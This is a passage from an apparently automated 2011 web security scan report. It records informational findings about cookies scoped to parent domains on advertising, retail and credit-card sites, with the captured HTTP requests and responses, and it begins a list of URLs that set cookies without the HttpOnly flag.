BizoData=mUpILgcy5Am7gipPAOipqO4dQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe09XlmHCOEm1FExkNK7HUtFp4B4dlWpgdjqa4UIiibMYaD8l3ZY0x538ism9qBDYo7JFUsjoCeA3EOXnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRSTI80GqzWbIcisOAmFdycmEVUJBxdqAyBvInlHLHRUhLGYmcCLsoQ49iinFlQOiiO0IipNN9QFd9eD7q0ii95BlORQkTqQOyFqsEcggxAnMEZgmSj4bIddpEGisTfkPzrOvT6EHuRZNgOOtPKCBwYlvwyxBTxBmxysG3aSMDFLVpGkH0mismRaiiQRlez2D3XiirmwcmKlBdv1ZVcwOipUiiqfwoqJRljWvSvhZfgeAie; Domain=.bizographics.com; Expires=Thu, 15-Dec-2011 23:22:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=wsj.com&pid=317&rnd=51922267233021560 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=front_nonsub&pageId=0_0_WH_0001_public&cb=280266
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1XTTepKPKlbVExkNK7HUtFp4B4dlWpgdj5lbCYEsl95T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Thu, 16 Jun 2011 11:22:22 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; Domain=.bizographics.com; Expires=Thu, 15-Dec-2011 23:22:22 GMT; Path=/
Set-Cookie: BizoData=mUpILgcy5Am7gipPAOipqO4dQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe09XlmHCOEm1FExkNK7HUtFp4B4dlWpgdjqa4UIiibMYaD8l3ZY0x538ism9qBDYo7JFUsjoCeA3EOXnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRSTI80GqzWbIcisOAmFdycmEVUJBxdqAyBvInlHLHRUhLGYmcCLsoQ49iinFlQOiiO0IipNN9QFd9eD7q0ii95BlORQkTqQOyFqsEcggxAnMEZgmSj4bIddpEGisTfkPzrOvT6EHuRZNgOOtPKCBwYlvwyxBTxBmxysG3aSMDFLVpGkH0mismRaiiQRlez2D3XiirmwcmKlBdv1ZVcwOipUiiqfwoqJRljWvSvhZfgeAie; Domain=.bizographics.com; Expires=Thu, 15-Dec-2011 23:22:22 GMT; Path=/
Content-Length: 0
Connection: keep-alive

10.290. http://www.burstnet.com/enlightn/7644//AC95/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7644//AC95/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=1Bq.1Dzj^17Y.1Dzs; path=/; expires=Sat, 16-Jun-2012 11:29:08 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7644//AC95/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; CMP=1Bq.1Dzj; /PC=5

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Thu, 16 Jun 2011 11:29:08 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^17Y.1Dzs; path=/; expires=Sat, 16-Jun-2012 11:29:08 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.291. http://www.capitalone.com/creditcards/gateway/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/creditcards/gateway/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /creditcards/gateway/?name=venture_one_rewards&credit=excellent&testgroup=01&external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105049&pg=1477&pgpos=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP_GROUP=test; BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; smartTracking=referrer%3A%3A%3Dwww.creditcards.com

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 17 Jun 2011 10:42:08 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960; path=/; domain=.capitalone.com
Location: http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85815EW
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1

10.292. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

40M3=3pWFyY9kEMHcGlaEIu8sNOSezY6Lr3vF3hNXsIhb5R5YYUx_6BT81lw; expires=Thu, 14-Jul-2011 11:38:29 GMT; path=/; domain=.homedepot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png?01AD=3pWFyY9kEMHcGlaEIu8sNOSezY6Lr3vF3hNXsIhb5R5YYUx_6BT81lw&01RI=8D496ACCADE463F&01NA= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2
Host: www.homedepot.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 11 May 2011 08:31:21 GMT
ETag: "194c7d-15d8-e5b24840"
Accept-Ranges: bytes
Content-Length: 5592
Content-Type: image/png
Cache-Control: max-age=17854
Date: Thu, 16 Jun 2011 11:38:29 GMT
Connection: close
Set-Cookie: 40M3=3pWFyY9kEMHcGlaEIu8sNOSezY6Lr3vF3hNXsIhb5R5YYUx_6BT81lw; expires=Thu, 14-Jul-2011 11:38:29 GMT; path=/; domain=.homedepot.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR...z...".......Z)....tEXtSoftware.Adobe ImageReadyq.e<...zIDATx..Z{.]Uy_...9.^. P.$...1JBR...h.....<lm........N........:)Vl+v.#..B...-Z.....HB.........{..{....[.u.........Z......7_..<
...[SNIP]...

10.293. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/orange_arrow.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

40M3=3h6q5Iw1xkSdtSdu92pP7Z4L72F3OloXD0N6PAxp8WRrSq-T_qifPUA; expires=Thu, 14-Jul-2011 11:37:04 GMT; path=/; domain=.homedepot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/hdus/en_US/images/layout/orange_arrow.gif?01AD=3h6q5Iw1xkSdtSdu92pP7Z4L72F3OloXD0N6PAxp8WRrSq-T_qifPUA&01RI=B3DB04D0E8B84C7&01NA=na HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-1
Host: www.homedepot.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Sat, 30 Oct 2010 05:04:29 GMT
ETag: "255a7a-36-8282d140"
Accept-Ranges: bytes
Content-Length: 54
Content-Type: image/gif
Cache-Control: max-age=37484
Date: Thu, 16 Jun 2011 11:37:04 GMT
Connection: close
Set-Cookie: 40M3=3h6q5Iw1xkSdtSdu92pP7Z4L72F3OloXD0N6PAxp8WRrSq-T_qifPUA; expires=Thu, 14-Jul-2011 11:37:04 GMT; path=/; domain=.homedepot.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a.. ......(...!...
...,...... .@...x...Tt.Exh*.;

10.294. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/ProductDisplay

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224139234%3a%3bC25%5fEXP%3d1360064139%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:39 GMT;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/ProductDisplay?langId=-1&storeId=10051&catalogId=10053&productId=202642971&R=202642971 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

10.295. http://www.wtp101.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/admeld_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sat, 15 Jun 2013 13:06:13 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Jun 2011 13:06:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=485&external_user_id=73b6b0a9-a657-4959-8c44-a72cc1d5226b
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sat, 15 Jun 2013 13:06:13 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

11. Cookie without HttpOnly flag set previous next
There are 391 instances of this issue:

http://afe.specificclick.net/
http://afe.specificclick.net/serve/v=5
http://cts-log.channelintelligence.com/
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/
http://lightsquared.com/
http://login.dotomi.com/ucm/UCMController
http://pixel.adsafeprotected.com/jspix
http://pixel.everesttech.net/1688/i
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://t.mookie1.com/t/v1/imp
http://ttwbs.channelintelligence.com/
http://www.creditcards.com/actions/clickBack.php
http://www.creditcards.com/oc/
http://www.creditcards.com/xtrack.php
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay
http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService
http://www.ilslaunch.com/skyterra-1-mission-control
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://a.amxdt.com/px/
http://a.rfihub.com/cm
http://a.rfihub.com/cm
http://a.rfihub.com/sed
http://a.rfihub.com/tk.gif
http://a.tribalfusion.com/i.match
http://a.tribalfusion.com/j.ad
http://a1.interclick.com/ColDta.aspx
http://a1.interclick.com/Segment.aspx
http://a1.interclick.com/getInPageJSProcess.aspx
http://a1.interclick.com/getInPageJSProcess.aspx
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://ads.bridgetrack.com/track/f/
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/ajs.php
http://ads.undertone.com/fc.php
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://ads.undertone.com/l
http://adsfac.us/ag.asp
http://adsfac.us/ag.asp
http://ak1.abmr.net/is/ads.undertone.com
http://ak1.abmr.net/is/r1-ads.ace.advertising.com
http://ak1.abmr.net/is/tag.admeld.com
http://ak1.abmr.net/is/www.homedepot.com
http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php
http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php
http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php
http://api.bizographics.com/v1/profile.json
http://api.bizographics.com/v1/profile.redirect
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c7.zedo.com/img/bh.gif
http://cas.criteo.com/delivery/afr.php
http://citi.bridgetrack.com/usc/_spredir.htm
http://citi.bridgetrack.com/usc/_spredir.htm
http://click.linksynergy.com/fs-bin/click
